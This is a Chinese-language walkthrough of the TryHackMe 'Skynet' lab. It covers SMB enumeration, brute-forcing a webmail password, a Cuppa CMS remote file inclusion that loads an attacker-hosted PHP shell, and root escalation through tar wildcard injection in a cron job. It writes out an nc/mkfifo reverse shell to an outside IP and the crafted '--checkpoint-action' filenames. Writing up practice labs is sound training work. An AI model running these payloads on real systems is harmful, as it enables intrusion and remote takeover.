Tryhackme -Skynet(考点:smb 密码爆破 cuppa RFI cronjob - tar提权)
1 扫描
忘了截图了,就是445 smb和80http 重要,一个进去找敏感文件,另一个进去搜集信息。
2 web信息搜集
gobuster扫gobuster dir -u http://10.10.190.147 -w /root/directory-list-2.3-medium.txt -t 64
松鼠邮件那个进去后是登录框。但是不知道密码
3 smb利用
enum4linux -a Ip地址
看到有俩处,匿名的当然可以进,mile那个没密码。
进匿名看,再log里,看到很多密码似的,保存下来,可以尝试爆破那个登录框。
懒得用hydra,要burp抓包写命令什么的,麻烦。简单的字典,直接burp里intruder里解密了。
参考靶机vulnversity操作方法一样。这篇是爆破后缀。
而我们此处,是爆破密码,因此在密码那里设置变量就行了。
字典就load刚才smb里发现的
开始攻击,第一个就是不一样的,就是他。
登录框登录,用户名就猜是smb里看到的那个milesdyson。成功
看到新的信件。重置了smb密码,也就是 smb 的milesdyson 我们有密码了。进去看看
smbclient -U milesdyson //10.10.190.147/milesdyson
进去后一路找,很简单,重要文件的名字都提示了是note important这些。看到新的目录。
gobuster再扫这个目录,发现是cuppa
4 cuppa RFI漏洞
搜到这个漏洞
https://www.exploit-db.com/exploits/25971
根据原文的提示,
http://target/cuppa/alerts/alertConfigField.php?urlConfig=http://www.shell.com/shell.txt?
当然要稍微结合靶机,修改下最后的rfi漏洞目录
自己准备好弹shell的php,放在自己的http里,打开http服务python -m SimpleHTTPServer 80
然后开监听,点击,就收到了。
http://10.10.190.147/45kra24zxs28v3yd/administrator/cuppa/alerts/alertConfigField.php?urlConfig=http://10.9.23.70/phpevil.php
5 提权
老套路linpeas.sh自动扫
cronjob里root在执行这个sh脚本。cron简单理解就是每隔段时间就干特定的活。如果里面有设置了root干什么活,那多半就是提权突破口。一般ctf题里的cron不会设置很长时间的。最多几分钟,难道让你等很久?
看看sh脚本里在做啥。
进入一个目录,再tar,tar是个经常用的压缩工具。
提权方法可以参考神奇网站gtfobins或者其他人的其他方法。
官网上的blog也有,更简单。
记住都是在/var/www/html
里执行这些,因为sh脚本里是进入这个目录执行tar。要配合他
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.9.40.157 31337 >/tmp/f" > shell.sh
touch "/var/www/html/--checkpoint-action=exec=sh shell.sh"
touch "/var/www/html/--checkpoint=1"
等会就收到了。拿下。
Tryhackme -Skynet(考点:smb 密码爆破 cuppa RFI cronjob - tar提权)相关推荐
- 安全测试(三) 服务器安全 渗透测试 常规服务器安全漏洞 高危端口暴露、弱口令密码、暴力破解、服务器提权、Mysql数据库提权等 浅谈《社会工程学》实战案例
文章目录 一.前言 二.服务器安全 高危端口 2.1 端口号(Port number) 2.2 常见端口后及其用途表 2.3 端口号 扫描工具介绍 2.4 端口号 端口说明 攻击技巧 2.5 安全警示 ...
- Vulnhub 靶机 VulnOSv2 write up opendocman cms 32075 sql注入 账号密码 ssh连接 37292.c 脏牛提权
VulnOSv2 write up 0x00 环境搭建 0x01 信息收集 0x02 漏洞挖掘 web思路 步骤一:枚举目录+主页挖掘 步骤二:OpenDocMan v1.2.7 cms利用 步骤三: ...
- 密码爆破工具:Medusa(美杜莎)-操作说明hydra-操作说明
目录 密码爆破工具:Medusa(美杜莎)-操作说明 hydra-操作说明 密码爆破工具:Medusa(美杜莎)-操作说明 科普下: Medusa是支持AFP, CVS, FTP, HTTP, IMA ...
- 密码爆破工具:Medusa(美杜莎)-操作说明
科普下: Medusa是支持AFP, CVS, FTP, HTTP, IMAP, MS-SQL, MySQL, NCP (NetWare), NNTP, PcAnywhere, POP3, Postg ...
- 黑客之路-使用hydra进行简单的密码爆破
需要用到的工具: Kali (也可以不需要) hydra (Kali自带,可以自行安装windows版或者其他平台) 密码字典 (自己去github找,关键词"字典") 本教程仅限 ...
- vulnhub - digitalworld.local: MERCY v2 (考点:信息搜集 smb 端口敲门 RIPS tomcat linux 提权)
https://www.vulnhub.com/entry/digitalworldlocal-mercy-v2,263/ nat网络 arp-scan -l 比平常多出来的ip就是靶机了 nmap ...
- Hydra—密码爆破神器
公司邮箱系统密码复杂度规则:字母大小写.数字.特殊字符,四选三,长度8位以上.这种复杂度的密码看着是比较安全的,但因历史原因,邮箱系统开放了外网登陆权限,加之公司人数众多,必然会有少量员工把自己的密码 ...
- 安全测试——利用Burpsuite密码爆破(Intruder入侵)
暴力破解简介: 暴力破解大致可以分为两大类,一类是基于Web表单的,另一类是基于服务协议(如 telnet.FTP.SSH等). 基于服务协议的爆破一般比较无脑,只要你的字典足够强大,没有 ...
- 〖教程〗NbtScan 139端口弱口令/Netbios密码爆破
版本 Ladon >= 7.1 139端口 NetBIOS File and Print Sharing 通过这个端口进入的连接试图获得NetBIOS/SMB服务.这个协议被用于Windows& ...
最新文章
- Linux排障必备命令
- EntityFramework 学习: Console中初见
- [转] C# 绘制报表,使用Graphics.DrawString 方法
- java定时执行sql语句_spring中使用quartz动态添加定时任务执行sql
- android viewpager监听,viewPager的OnPageChangeListener监听器的方法调用顺序
- oracle序时账是什么,​序时账和明细账区别是什么
- dhcp authoritative参数作用
- inputbox使用
- Electron 安装报错 'Electron failed to install correctly'
- 建筑企业收并购系列二:股转与吸收合并
- 虚拟机装vpn,主机通过虚拟机的vpn代理实现vpn共享
- Automatically assigning platform `iOS` with version `8.0` on target `Runner`
- 免企业资质免签约支付
- Prisemi芯导充电和保护硬科技亮相亚洲蓝牙耳机展
- C++ 获取特定进程的CPU使用率
- iOS 高德地图(五)绘制点标记
- arcgis for js4二维地图比例尺
- 无基础的人如何唱好歌、三分钟让你快速学会唱歌技巧
- 美团商家的数据指标体系是怎么做的?
- 解决Ubuntu软件商店无法更新问题
热门文章
- Python中ASCII转十六进制、C中BCD转十进制、十六进制学习记录
- 【P28】Enjoy The jFET 超简分立耳放
- BiSeNetV1 面部分割
- js微信抢红包脚本代码_微信红包算法(js)
- springboot配置datasource连接与mapper.xml文件位置
- HTML大文件上传解决方案实例代码
- 2022新URL网址SEO外链自动发布网站源码+LayUI开发
- matlab怎么运行步进,有没有大侠知道怎么用matlab控制步进电机
- python csv
- Linux安装云原生网关Kong/KongA